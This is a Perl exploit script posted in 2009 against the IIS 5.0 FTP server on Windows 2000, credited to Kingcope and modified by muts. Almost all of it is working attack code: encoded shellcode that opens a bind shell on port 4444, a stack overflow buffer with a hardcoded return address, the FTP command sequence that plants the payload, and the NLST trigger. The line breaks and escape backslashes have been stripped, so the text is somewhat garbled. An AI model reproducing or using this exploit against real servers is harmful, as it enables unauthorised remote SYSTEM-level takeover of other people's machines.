iis50-overflow.txt
Posted on 02 September 2009
#!/usr/bin/perl # IIS 5.0 FTP Server / Remote SYSTEM exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # Modded by muts, additional egghunter added for secondary larger payload # Might take a minute or two for the egg to be found. # Opens bind shell on port 4444 # http://www.offensive-security.com/0day/msftp.pl.txt use IO::Socket; $|=1; $sc = "x89xe2xddxc5xd9x72xf4x5fx57x59x49x49x49x49x43" . "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" . "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" . "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" . "x50x38x41x43x4ax4ax49x45x36x4dx51x48x4ax4bx4f" . "x44x4fx47x32x46x32x42x4ax43x32x46x38x48x4dx46" . "x4ex47x4cx45x55x51x4ax44x34x4ax4fx48x38x46x34" . "x50x30x46x50x50x57x4cx4bx4bx4ax4ex4fx44x35x4a" . "x4ax4ex4fx43x45x4bx57x4bx4fx4dx37x41x41"; # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "x00x0ax0d" $shell="T00WT00W" ."xdaxdexbdx2dxe7x9bx9fx2bxc9xb1x56xd9x74x24xf4" . "x5ax83xeaxfcx31x6ax15x03x6ax15xcfx12x67x77x86" . "xddx98x88xf8x54x7dxb9x2ax02xf5xe8xfax40x5bx01" . "x71x04x48x92xf7x81x7fx13xbdxf7x4exa4x70x38x1c" . "x66x13xc4x5fxbbxf3xf5xafxcexf2x32xcdx21xa6xeb" . "x99x90x56x9fxdcx28x57x4fx6bx10x2fxeaxacxe5x85" . "xf5xfcx56x92xbexe4xddxfcx1ex14x31x1fx62x5fx3e" . "xebx10x5ex96x22xd8x50xd6xe8xe7x5cxdbxf1x20x5a" . "x04x84x5ax98xb9x9ex98xe2x65x2bx3dx44xedx8bxe5" . "x74x22x4dx6dx7ax8fx1ax29x9fx0excfx41x9bx9bxee" . "x85x2dxdfxd4x01x75xbbx75x13xd3x6ax8ax43xbbxd3" . "x2ex0fx2ex07x48x52x27xe4x66x6dxb7x62xf1x1ex85" . "x2dxa9x88xa5xa6x77x4exc9x9cxcfxc0x34x1fx2fxc8" . "xf2x4bx7fx62xd2xf3x14x72xdbx21xbax22x73x9ax7a" . "x93x33x4ax12xf9xbbxb5x02x02x16xc0x05xccx42x80" . "xe1x2dx75x36xadxb8x93x52x5dxedx0cxcbx9fxcax84" . "x6cxe0x38xb9x25x76x74xd7xf2x79x85xfdx50xd6x2d" . "x96x22x34xeax87x34x11x5axc1x0cxf1x10xbfxdfx60" . "x24xeax88x01xb7x71x49x4cxa4x2dx1ex19x1ax24xca" . "xb7x05x9exe9x4axd3xd9xaax90x20xe7x33x55x1cxc3" . "x23xa3x9dx4fx10x7bxc8x19xcex3dxa2xebxb8x97x19" . "xa2x2cx6ex52x75x2bx6fxbfx03xd3xc1x16x52xebxed" . "xfex52x94x10x9fx9dx4fx91xbfx7fx5axefx57x26x0f" . "x52x3axd9xe5x90x43x5ax0cx68xb0x42x65x6dxfcxc4" . "x95x1fx6dxa1x99x8cx8exe0x90"; print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2 "; if ($#ARGV ne 1) { print "usage: iiz5.pl <target> <your local ip> "; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '21', Proto => 'tcp'); $patch = "x7ExF1xFAx7F"; $retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms $v = "KSEXY" . $sc . "V" x (500-length($sc)-5); # top address of stack frame where shellcode resides, is hardcoded inside this block $findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53" ."x45x58x59x75xF7x40x40x40x40xFFxFFxE0"; # attack buffer $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. "HHHHIIII". $patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN"; $x = <$sock>; print $x; print $sock "USER anonimoos "; $x = <$sock>; print $x; print $sock "PASS $shell "; $x = <$sock>; print $x; print $sock "USER anonimoos "; $x = <$sock>; print $x; print $sock "PASS $shell "; $x = <$sock>; print $x; print $sock "USER anonymous "; $x = <$sock>; print $x; print $sock "PASS anonymous "; $x = <$sock>; print $x; print $sock "MKD w00t$port "; $x = <$sock>; print $x; print $sock "SITE $v "; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock "SITE $v "; $x = <$sock>; print $x; print $sock "SITE $v "; $x = <$sock>; print $x; print $sock "SITE $v "; $x = <$sock>; print $x; print $sock "SITE $v "; $x = <$sock>; print $x; print $sock "CWD w00t$port "; $x = <$sock>; print $x; print $sock "MKD CCC". "$c "; $x = <$sock>; print $x; print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . " "; $x = <$sock>; print $x; # TRIGGER print $sock "NLST $c*/../C*/ "; $x = <$sock>; print $x; while (1) {} } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $! " unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio, # #Kingcope
